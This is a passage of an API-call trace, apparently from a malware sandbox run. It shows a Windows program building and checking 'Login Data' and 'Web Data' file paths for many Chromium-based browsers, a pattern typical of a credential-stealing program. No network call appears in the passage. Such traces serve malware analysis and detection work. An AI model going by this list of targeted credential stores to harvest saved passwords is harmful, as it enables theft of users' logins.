dwFlags=0x0, lpMem=0x863520 | out: hHeap=0x840000) returned 1 [0172.069] GetProcessHeap () returned 0x840000 [0172.069] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f80) returned 0x870bc8 [0172.070] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0172.071] wvsprintfW (in: param_1=0x870bc8, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f41c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Coowon\\Coowon\\User Data\\Default\\Web Data") returned 76 [0172.071] GetProcessHeap () returned 0x840000 [0172.071] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x9c) returned 0x862c98 [0172.071] GetProcessHeap () returned 0x840000 [0172.071] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870bc8 | out: hHeap=0x840000) returned 1 [0172.071] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0172.072] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Coowon\\Coowon\\User Data\\Default\\Web Data") returned 0 [0172.072] GetProcessHeap () returned 0x840000 [0172.072] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x862c98 | out: hHeap=0x840000) returned 1 [0172.072] GetProcessHeap () returned 0x840000 [0172.072] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f5e) returned 0x870bc8 [0172.073] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0172.073] wvsprintfW (in: param_1=0x870bc8, param_2="%s%s\\Login Data", arglist=0x19f41c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalCoowon\\Coowon\\Login Data") returned 59 [0172.073] GetProcessHeap () returned 0x840000 [0172.073] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7a) returned 0x874b30 [0172.074] GetProcessHeap () returned 0x840000 [0172.074] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870bc8 | out: hHeap=0x840000) returned 1 [0172.074] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0172.074] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalCoowon\\Coowon\\Login Data") returned 0 [0172.075] GetProcessHeap () returned 0x840000 [0172.075] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x874b30 | out: hHeap=0x840000) returned 1 [0172.075] GetProcessHeap () returned 0x840000 [0172.075] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f6e) returned 0x870bc8 [0172.075] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0172.515] wvsprintfW (in: param_1=0x870bc8, param_2="%s%s\\Default\\Login Data", arglist=0x19f41c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalCoowon\\Coowon\\Default\\Login Data") returned 67 [0172.515] GetProcessHeap () returned 0x840000 [0172.515] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x8a) returned 0x874b40 [0172.516] GetProcessHeap () returned 0x840000 [0172.516] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870bc8 | out: hHeap=0x840000) returned 1 [0172.516] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0172.517] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalCoowon\\Coowon\\Default\\Login Data") returned 0 [0172.521] GetProcessHeap () returned 0x840000 [0172.521] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x874b40 | out: hHeap=0x840000) returned 1 [0172.521] GetProcessHeap () returned 0x840000 [0172.521] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f84) returned 0x870bc8 [0172.522] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0172.550] wvsprintfW (in: param_1=0x870bc8, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f420 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Mustang Browser\\User Data\\Default\\Login Data") returned 80 [0172.550] GetProcessHeap () returned 0x840000 [0172.550] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xa4) returned 0x874b58 [0172.550] GetProcessHeap () returned 0x840000 [0172.550] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870bc8 | out: hHeap=0x840000) returned 1 [0172.551] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0172.551] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Mustang Browser\\User Data\\Default\\Login Data") returned 0 [0172.559] GetProcessHeap () returned 0x840000 [0172.559] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x874b58 | out: hHeap=0x840000) returned 1 [0172.559] GetProcessHeap () returned 0x840000 [0172.559] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f80) returned 0x870bc8 [0172.569] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0172.601] wvsprintfW (in: param_1=0x870bc8, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f41c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Mustang Browser\\User Data\\Default\\Web Data") returned 78 [0172.603] GetProcessHeap () returned 0x840000 [0172.603] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xa0) returned 0x862de8 [0172.603] GetProcessHeap () returned 0x840000 [0172.603] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870bc8 | out: hHeap=0x840000) returned 1 [0172.603] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0172.604] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Mustang Browser\\User Data\\Default\\Web Data") returned 0 [0172.604] GetProcessHeap () returned 0x840000 [0172.604] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x862de8 | out: hHeap=0x840000) returned 1 [0172.604] GetProcessHeap () returned 0x840000 [0172.604] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f5e) returned 0x870bc8 [0172.612] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0172.613] wvsprintfW (in: param_1=0x870bc8, param_2="%s%s\\Login Data", arglist=0x19f41c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalMustang Browser\\Login Data") returned 61 [0172.614] GetProcessHeap () returned 0x840000 [0172.614] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7e) returned 0x874b30 [0172.614] GetProcessHeap () returned 0x840000 [0172.614] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870bc8 | out: hHeap=0x840000) returned 1 [0172.615] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0172.615] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalMustang Browser\\Login Data") returned 0 [0172.616] GetProcessHeap () returned 0x840000 [0172.616] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x874b30 | out: hHeap=0x840000) returned 1 [0172.616] GetProcessHeap () returned 0x840000 [0172.617] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f6e) returned 0x870bc8 [0172.617] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0172.618] wvsprintfW (in: param_1=0x870bc8, param_2="%s%s\\Default\\Login Data", arglist=0x19f41c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalMustang Browser\\Default\\Login Data") returned 69 [0172.618] GetProcessHeap () returned 0x840000 [0172.618] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x8e) returned 0x874b40 [0172.618] GetProcessHeap () returned 0x840000 [0172.619] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870bc8 | out: hHeap=0x840000) returned 1 [0172.669] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0172.669] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalMustang Browser\\Default\\Login Data") returned 0 [0172.670] GetProcessHeap () returned 0x840000 [0172.670] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x874b40 | out: hHeap=0x840000) returned 1 [0172.670] GetProcessHeap () returned 0x840000 [0172.670] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f84) returned 0x870bc8 [0172.671] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0172.672] wvsprintfW (in: param_1=0x870bc8, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f420 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\360Browser\\Browser\\User Data\\Default\\Login Data") returned 83 [0172.672] GetProcessHeap () returned 0x840000 [0172.672] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xaa) returned 0x874b58 [0172.672] GetProcessHeap () returned 0x840000 [0172.672] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870bc8 | out: hHeap=0x840000) returned 1 [0172.673] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0172.673] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\360Browser\\Browser\\User Data\\Default\\Login Data") returned 0 [0172.674] GetProcessHeap () returned 0x840000 [0172.674] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x874b58 | out: hHeap=0x840000) returned 1 [0172.674] GetProcessHeap () returned 0x840000 [0172.674] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f80) returned 0x870bc8 [0172.674] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0172.675] wvsprintfW (in: param_1=0x870bc8, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f41c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\360Browser\\Browser\\User Data\\Default\\Web Data") returned 81 [0172.675] GetProcessHeap () returned 0x840000 [0172.675] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xa6) returned 0x874b50 [0172.675] GetProcessHeap () returned 0x840000 [0172.675] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870bc8 | out: hHeap=0x840000) returned 1 [0172.676] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0172.676] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\360Browser\\Browser\\User Data\\Default\\Web Data") returned 0 [0172.677] GetProcessHeap () returned 0x840000 [0172.677] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x874b50 | out: hHeap=0x840000) returned 1 [0172.677] GetProcessHeap () returned 0x840000 [0172.677] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f5e) returned 0x870bc8 [0172.678] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0172.678] wvsprintfW (in: param_1=0x870bc8, param_2="%s%s\\Login Data", arglist=0x19f41c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local360Browser\\Browser\\Login Data") returned 64 [0172.678] GetProcessHeap () returned 0x840000 [0172.679] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x84) returned 0x874b30 [0172.679] GetProcessHeap () returned 0x840000 [0172.679] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870bc8 | out: hHeap=0x840000) returned 1 [0172.680] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0172.680] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local360Browser\\Browser\\Login Data") returned 0 [0172.680] GetProcessHeap () returned 0x840000 [0172.680] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x874b30 | out: hHeap=0x840000) returned 1 [0172.680] GetProcessHeap () returned 0x840000 [0172.680] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f6e) returned 0x870bc8 [0172.681] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0172.682] wvsprintfW (in: param_1=0x870bc8, param_2="%s%s\\Default\\Login Data", arglist=0x19f41c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local360Browser\\Browser\\Default\\Login Data") returned 72 [0172.682] GetProcessHeap () returned 0x840000 [0172.682] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x94) returned 0x874b40 [0172.682] GetProcessHeap () returned 0x840000 [0172.682] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870bc8 | out: hHeap=0x840000) returned 1 [0172.683] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0172.683] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local360Browser\\Browser\\Default\\Login Data") returned 0 [0172.684] GetProcessHeap () returned 0x840000 [0172.684] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x874b40 | out: hHeap=0x840000) returned 1 [0172.684] GetProcessHeap () returned 0x840000 [0172.684] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f84) returned 0x870bc8 [0172.685] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0172.685] wvsprintfW (in: param_1=0x870bc8, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f420 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CatalinaGroup\\Citrio\\User Data\\Default\\Login Data") returned 85 [0172.685] GetProcessHeap () returned 0x840000 [0172.685] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x874b58 [0172.685] GetProcessHeap () returned 0x840000 [0172.685] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870bc8 | out: hHeap=0x840000) returned 1 [0172.686] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0172.686] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CatalinaGroup\\Citrio\\User Data\\Default\\Login Data") returned 0 [0172.687] GetProcessHeap () returned 0x840000 [0172.687] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x874b58 | out: hHeap=0x840000) returned 1 [0172.687] GetProcessHeap () returned 0x840000 [0172.687] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f80) returned 0x870bc8 [0172.688] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0173.424] wvsprintfW (in: param_1=0x870bc8, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f41c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CatalinaGroup\\Citrio\\User Data\\Default\\Web Data") returned 83 [0173.424] GetProcessHeap () returned 0x840000 [0173.424] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xaa) returned 0x874b50 [0173.424] GetProcessHeap () returned 0x840000 [0173.424] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870bc8 | out: hHeap=0x840000) returned 1 [0173.425] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0173.425] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CatalinaGroup\\Citrio\\User Data\\Default\\Web Data") returned 0 [0173.425] GetProcessHeap () returned 0x840000 [0173.425] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x874b50 | out: hHeap=0x840000) returned 1 [0173.425] GetProcessHeap () returned 0x840000 [0173.425] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f5e) returned 0x870bc8 [0173.426] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0173.427] wvsprintfW (in: param_1=0x870bc8, param_2="%s%s\\Login Data", arglist=0x19f41c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalCatalinaGroup\\Citrio\\Login Data") returned 66 [0173.427] GetProcessHeap () returned 0x840000 [0173.427] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x88) returned 0x874b30 [0173.427] GetProcessHeap () returned 0x840000 [0173.427] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870bc8 | out: hHeap=0x840000) returned 1 [0173.428] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0173.433] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalCatalinaGroup\\Citrio\\Login Data") returned 0 [0173.434] GetProcessHeap () returned 0x840000 [0173.434] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x874b30 | out: hHeap=0x840000) returned 1 [0173.434] GetProcessHeap () returned 0x840000 [0173.434] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f6e) returned 0x870bc8 [0173.435] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0173.436] wvsprintfW (in: param_1=0x870bc8, param_2="%s%s\\Default\\Login Data", arglist=0x19f41c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalCatalinaGroup\\Citrio\\Default\\Login Data") returned 74 [0173.436] GetProcessHeap () returned 0x840000 [0173.436] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x98) returned 0x874b40 [0173.436] GetProcessHeap () returned 0x840000 [0173.436] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870bc8 | out: hHeap=0x840000) returned 1 [0173.437] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0173.437] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalCatalinaGroup\\Citrio\\Default\\Login Data") returned 0 [0173.438] GetProcessHeap () returned 0x840000 [0173.438] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x874b40 | out: hHeap=0x840000) returned 1 [0173.438] GetProcessHeap () returned 0x840000 [0173.438] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f84) returned 0x870bc8 [0173.438] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0173.439] wvsprintfW (in: param_1=0x870bc8, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f420 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\Default\\Login Data") returned 82 [0173.439] GetProcessHeap () returned 0x840000 [0173.439] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xa8) returned 0x874b58 [0173.439] GetProcessHeap () returned 0x840000 [0173.440] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870bc8 | out: hHeap=0x840000) returned 1 [0173.440] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0173.441] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\Default\\Login Data") returned 0 [0173.441] GetProcessHeap () returned 0x840000 [0173.441] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x874b58 | out: hHeap=0x840000) returned 1 [0173.441] GetProcessHeap () returned 0x840000 [0173.441] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f80) returned 0x870bc8 [0173.442] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0173.443] wvsprintfW (in: param_1=0x870bc8, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f41c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\Default\\Web Data") returned 80 [0173.443] GetProcessHeap () returned 0x840000 [0173.443] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xa4) returned 0x874b50 [0173.443] GetProcessHeap () returned 0x840000 [0173.443] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870bc8 | out: hHeap=0x840000) returned 1 [0173.444] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0173.444] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\Default\\Web Data") returned 0 [0173.445] GetProcessHeap () returned 0x840000 [0173.445] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x874b50 | out: hHeap=0x840000) returned 1 [0173.445] GetProcessHeap () returned 0x840000 [0173.445] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f5e) returned 0x870bc8 [0173.446] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0173.446] wvsprintfW (in: param_1=0x870bc8, param_2="%s%s\\Login Data", arglist=0x19f41c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalGoogle\\Chrome SxS\\Login Data") returned 63 [0173.447] GetProcessHeap () returned 0x840000 [0173.447] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x82) returned 0x874b30 [0173.447] GetProcessHeap () returned 0x840000 [0173.447] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870bc8 | out: hHeap=0x840000) returned 1 [0173.448] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0173.448] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalGoogle\\Chrome SxS\\Login Data") returned 0 [0173.448] GetProcessHeap () returned 0x840000 [0173.448] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x874b30 | out: hHeap=0x840000) returned 1 [0173.448] GetProcessHeap () returned 0x840000 [0173.448] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f6e) returned 0x870bc8 [0173.449] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0173.450] wvsprintfW (in: param_1=0x870bc8, param_2="%s%s\\Default\\Login Data", arglist=0x19f41c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalGoogle\\Chrome SxS\\Default\\Login Data") returned 71 [0173.450] GetProcessHeap () returned 0x840000 [0173.450] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x92) returned 0x874b40 [0173.450] GetProcessHeap () returned 0x840000 [0173.451] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870bc8 | out: hHeap=0x840000) returned 1 [0173.451] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0173.452] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalGoogle\\Chrome SxS\\Default\\Login Data") returned 0 [0173.452] GetProcessHeap () returned 0x840000 [0173.452] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x874b40 | out: hHeap=0x840000) returned 1 [0173.452] GetProcessHeap () returned 0x840000 [0173.452] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f84) returned 0x870bc8 [0173.453] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0173.454] wvsprintfW (in: param_1=0x870bc8, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f420 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Orbitum\\User Data\\Default\\Login Data") returned 72 [0173.454] GetProcessHeap () returned 0x840000 [0173.454] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x94) returned 0x874b58 [0173.454] GetProcessHeap () returned 0x840000 [0173.454] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870bc8 | out: hHeap=0x840000) returned 1 [0173.455] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0173.455] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Orbitum\\User Data\\Default\\Login Data") returned 0 [0173.455] GetProcessHeap () returned 0x840000 [0173.455] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x874b58 | out: hHeap=0x840000) returned 1 [0173.455] GetProcessHeap () returned 0x840000 [0173.455] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f80) returned 0x870bc8 [0173.456] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0173.457] wvsprintfW (in: param_1=0x870bc8, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f41c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Orbitum\\User Data\\Default\\Web Data") returned 70 [0173.457] GetProcessHeap () returned 0x840000 [0173.457] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x90) returned 0x874b50 [0173.457] GetProcessHeap () returned 0x840000 [0173.457] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870bc8 | out: hHeap=0x840000) returned 1 [0173.458] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0173.458] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Orbitum\\User Data\\Default\\Web Data") returned 0 [0173.459] GetProcessHeap () returned 0x840000 [0173.459] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x874b50 | out: hHeap=0x840000) returned 1 [0173.459] GetProcessHeap () returned 0x840000 [0173.459] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f5e) returned 0x870bc8 [0173.460] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0173.461] wvsprintfW (in: param_1=0x870bc8, param_2="%s%s\\Login Data", arglist=0x19f41c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalOrbitum\\Login Data") returned 53 [0173.461] GetProcessHeap () returned 0x840000 [0173.461] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x6e) returned 0x874b30 [0173.461] GetProcessHeap () returned 0x840000 [0173.461] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870bc8 | out: hHeap=0x840000) returned 1 [0173.466] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0173.791] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalOrbitum\\Login Data") returned 0 [0173.791] GetProcessHeap () returned 0x840000 [0173.791] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x874b30 | out: hHeap=0x840000) returned 1 [0173.791] GetProcessHeap () returned 0x840000 [0173.791] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f6e) returned 0x870bc8 [0174.551] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0174.552] wvsprintfW (in: param_1=0x870bc8, param_2="%s%s\\Default\\Login Data", arglist=0x19f41c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalOrbitum\\Default\\Login Data") returned 61 [0174.552] GetProcessHeap () returned 0x840000 [0174.552] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7e) returned 0x874b40 [0174.552] GetProcessHeap () returned 0x840000 [0174.552] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870bc8 | out: hHeap=0x840000) returned 1 [0174.553] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0174.553] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalOrbitum\\Default\\Login Data") returned 0 [0174.553] GetProcessHeap () returned 0x840000 [0174.553] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x874b40 | out: hHeap=0x840000) returned 1 [0174.553] GetProcessHeap () returned 0x840000 [0174.553] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f84) returned 0x870bc8 [0174.554] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0174.555] wvsprintfW (in: param_1=0x870bc8, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f420 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Iridium\\User Data\\Default\\Login Data") returned 72 [0174.555] GetProcessHeap () returned 0x840000 [0174.555] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x94) returned 0x874b58 [0174.555] GetProcessHeap () returned 0x840000 [0174.555] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870bc8 | out: hHeap=0x840000) returned 1 [0174.556] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0174.556] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Iridium\\User Data\\Default\\Login Data") returned 0 [0174.556] GetProcessHeap () returned 0x840000 [0174.556] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x874b58 | out: hHeap=0x840000) returned 1 [0174.556] GetProcessHeap () returned 0x840000 [0174.556] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f80) returned 0x870bc8 [0174.557] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0174.558] wvsprintfW (in: param_1=0x870bc8, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f41c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Iridium\\User Data\\Default\\Web Data") returned 70 [0174.558] GetProcessHeap () returned 0x840000 [0174.558] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x90) returned 0x874b50 [0174.558] GetProcessHeap () returned 0x840000 [0174.558] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870bc8 | out: hHeap=0x840000) returned 1 [0174.558] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0174.558] PathFileExistsW 